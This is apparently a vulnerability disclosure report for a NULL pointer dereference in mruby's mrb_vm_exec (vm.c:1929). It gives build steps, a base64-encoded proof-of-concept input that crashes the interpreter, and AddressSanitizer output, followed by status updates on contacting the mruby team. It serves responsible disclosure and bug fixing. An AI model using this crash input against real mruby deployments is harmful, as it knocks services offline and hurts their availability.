NULL Pointer Dereference in mruby/mruby
Valid
Reported on
Mar 7th 2022
Description
There is a NULL Pointer Dereference in mrb_vm_exec (vm.c:1929). This bug has been found on mruby lastest commit (hash c2f7ed514dfa0fcae2e7e72d51f25be3d3d6d72c) on Ubuntu 20.04 for x86_64/amd64.
Proof of Concept
1- Clone repo and build with ASAN using MRUBY_CONFIG=build_config/clang-asan.rb rake.
2- Use mruby to execute the poc (it is base64-encoded since it contains unprintable characters):
$ echo -ne 'Yj0iMCIKezA9Pm5pbH0KW11hbmQKYi5jb2RlcG9pbnRze2luc3RhbmNlX2V2YWx7bG9vcC5uZXh0
e30KYi5jb2RlcG9pbnRze0ZpYmVyLm5ld3t9LnRyYW5zZmVyKDAsMCwwLDAsMCwwLDAsMCwwLDAs
MCwwLDAsMCwwKX19fQ==' | base64 -d > poc
$ mruby poc
/home/faraday/mruby/src/vm.c:1929:16: runtime error: member access within misaligned address 0x000000000001 for type 'struct RArray', which requires 8 byte alignment
0x000000000001: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/vm.c:1929:16 in
AddressSanitizer:DEADLYSIGNAL
=================================================================
==36117==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x0000006f01ea bp 0x7fffb088c190 sp 0x7fffb086aa60 T0)
==36117==The signal is caused by a READ memory access.
==36117==Hint: address points to the zero page.
#0 0x6f01ea in mrb_vm_exec /home/faraday/mruby/src/vm.c:1929:16
#1 0x6b0ca9 in mrb_vm_run /home/faraday/mruby/src/vm.c:1130:12
#2 0x6a5a79 in mrb_top_run /home/faraday/mruby/src/vm.c:3039:12
#3 0x8b0ef1 in mrb_load_exec /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6890:7
#4 0x8b2b56 in mrb_load_detect_file_cxt /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6933:12
#5 0x4c6420 in main /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
#6 0x7f8c3f9ff0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#7 0x41c85d in _start (/home/faraday/mruby/build/host/bin/mruby+0x41c85d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/vm.c:1929:16 in mrb_vm_exec
==36117==ABORTING
Impact
This vulnerability is capable of making the mruby interpreter crash, thus affecting the availability of the system.
Acknowledgements
This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.
We are processing your report and will contact the
mruby
team within 24 hours.
a year ago
We have contacted a member of the
mruby
team and are waiting to hear back
a year ago
to join this conversation